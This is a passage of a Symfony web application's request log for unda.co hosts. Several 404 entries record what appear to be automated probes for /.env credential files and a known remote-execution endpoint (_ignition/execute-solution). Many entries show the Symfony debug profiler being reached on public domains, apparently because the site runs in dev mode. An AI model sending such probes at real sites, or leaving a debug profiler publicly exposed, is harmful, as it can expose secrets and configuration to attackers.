  4880. [2025-12-19 03:53:09] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"HEAD"} []
  4881. [2025-12-19 03:53:09] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
  4882. [2025-12-19 03:53:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4883. [2025-12-19 03:53:10] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
  4884. [2025-12-19 03:53:12] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"POST"} []
  4885. [2025-12-19 03:53:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_ignition/execute-solution"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_ignition/execute-solution\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4886. [2025-12-19 03:53:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public/_ignition/execute-solution"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public/_ignition/execute-solution\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4887. [2025-12-19 03:57:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7d563a","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7d563a","method":"GET"} []
  4888. [2025-12-19 03:57:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  4889. [2025-12-19 04:00:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3b202b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3b202b?panel=form","method":"GET"} []
  4890. [2025-12-19 04:00:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  4891. [2025-12-19 04:03:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /atom.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /atom.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4892. [2025-12-19 04:06:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56147c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56147c?panel=config","method":"GET"} []
  4893. [2025-12-19 04:06:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  4894. [2025-12-19 04:06:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"baa854","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/baa854?panel=request","method":"GET"} []
  4895. [2025-12-19 04:06:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  4896. [2025-12-19 04:13:51] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  4897. [2025-12-19 04:15:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56147c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56147c?panel=cache","method":"GET"} []
  4898. [2025-12-19 04:15:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  4899. [2025-12-19 04:17:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4900. [2025-12-19 04:24:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7d563a","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7d563a?panel=twig","method":"GET"} []
  4901. [2025-12-19 04:24:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  4902. [2025-12-19 04:25:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"30b00d","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/30b00d?panel=time","method":"GET"} []
  4903. [2025-12-19 04:25:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4904. [2025-12-19 04:31:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"27f092","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/27f092?panel=form","method":"GET"} []
  4905. [2025-12-19 04:31:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  4906. [2025-12-19 04:34:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2a5c36","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2a5c36?panel=security","method":"GET"} []
  4907. [2025-12-19 04:34:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  4908. [2025-12-19 04:37:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/latest?panel=form","method":"GET"} []
  4909. [2025-12-19 04:37:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  4910. [2025-12-19 04:42:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b27c2a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b27c2a?panel=dump","method":"GET"} []
  4911. [2025-12-19 04:42:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  4912. [2025-12-19 04:44:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2a5c36","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2a5c36?panel=request","method":"GET"} []
  4913. [2025-12-19 04:44:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  4914. [2025-12-19 04:45:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /enhancecp"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /enhancecp\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4915. [2025-12-19 04:47:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ea8628","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ea8628","method":"GET"} []
  4916. [2025-12-19 04:47:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  4917. [2025-12-19 04:47:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ac55c9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ac55c9?panel=cache","method":"GET"} []
  4918. [2025-12-19 04:47:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  4919. [2025-12-19 04:53:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56147c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56147c?panel=twig","method":"GET"} []
  4920. [2025-12-19 04:53:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  4921. [2025-12-19 04:57:21] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  4922. [2025-12-19 05:02:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56147c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56147c?panel=security","method":"GET"} []
  4923. [2025-12-19 05:02:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  4924. [2025-12-19 05:04:33] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  4925. [2025-12-19 05:06:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4926. [2025-12-19 05:11:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7d563a","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7d563a?panel=request","method":"GET"} []
  4927. [2025-12-19 05:11:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  4928. [2025-12-19 05:12:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"92f21a","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/92f21a?panel=time","method":"GET"} []
  4929. [2025-12-19 05:12:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4930. [2025-12-19 05:15:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ad52ae","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ad52ae?group=1&panel=db","method":"GET"} []
  4931. [2025-12-19 05:15:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
  4932. [2025-12-19 05:15:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f7acf9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f7acf9?panel=time","method":"GET"} []
  4933. [2025-12-19 05:15:08] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4934. [2025-12-19 05:18:01] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4935. [2025-12-19 05:22:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2a5c36","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2a5c36?panel=twig","method":"GET"} []
  4936. [2025-12-19 05:22:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  4937. [2025-12-19 05:24:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9fab17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/9fab17?panel=events","method":"GET"} []
  4938. [2025-12-19 05:24:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  4939. [2025-12-19 05:24:43] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"092da8","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/092da8/search/results?limit=10&method=GET","method":"GET"} []
  4940. [2025-12-19 05:24:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  4941. [2025-12-19 05:25:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b30c5e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b30c5e","method":"GET"} []
  4942. [2025-12-19 05:25:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  4943. [2025-12-19 05:27:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7bd27a","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/7bd27a?panel=router","method":"GET"} []
  4944. [2025-12-19 05:27:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  4945. [2025-12-19 05:29:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4c9de0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/4c9de0","method":"GET"} []
  4946. [2025-12-19 05:29:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  4947. [2025-12-19 05:32:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"322ef6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/322ef6?panel=form","method":"GET"} []
  4948. [2025-12-19 05:32:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  4949. [2025-12-19 05:33:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"82bc72","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/82bc72?panel=swiftmailer","method":"GET"} []
  4950. [2025-12-19 05:33:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  4951. [2025-12-19 05:34:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2a5c36","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2a5c36?panel=time","method":"GET"} []
  4952. [2025-12-19 05:34:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  4953. [2025-12-19 05:46:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2a5c36","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2a5c36?panel=cache","method":"GET"} []
  4954. [2025-12-19 05:46:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  4955. [2025-12-19 05:46:55] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"130ea7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/130ea7?panel=events","method":"GET"} []
  4956. [2025-12-19 05:46:55] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  4957. [2025-12-19 05:52:17] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  4958. [2025-12-19 05:55:20] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  4959. [2025-12-19 05:58:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2a5c36","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2a5c36","method":"GET"} []
  4960. [2025-12-19 05:58:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  4961. [2025-12-19 06:01:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b6a418","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b6a418","method":"GET"} []
  4962. [2025-12-19 06:01:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  4963. [2025-12-19 06:05:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  4964. [2025-12-19 06:10:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2a5c36","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2a5c36?panel=config","method":"GET"} []
  4965. [2025-12-19 06:10:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  4966. [2025-12-19 06:11:28] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"45c799","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/45c799/search/results?limit=10&method=GET","method":"GET"} []
  4967. [2025-12-19 06:11:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  4968. [2025-12-19 06:11:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fa8c04","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fa8c04?panel=exception","method":"GET"} []
  4969. [2025-12-19 06:11:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  4970. [2025-12-19 06:16:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"88c253","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/88c253?panel=security","method":"GET"} []
  4971. [2025-12-19 06:16:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  4972. [2025-12-19 06:17:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"13e8f6","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/13e8f6?panel=exception","method":"GET"} []
  4973. [2025-12-19 06:17:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  4974. [2025-12-19 06:22:43] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"408a13","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/408a13/search/results?limit=10&method=GET","method":"GET"} []
  4975. [2025-12-19 06:22:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  4976. [2025-12-19 06:23:08] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"56147c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/56147c?panel=time","method":"GET"} []
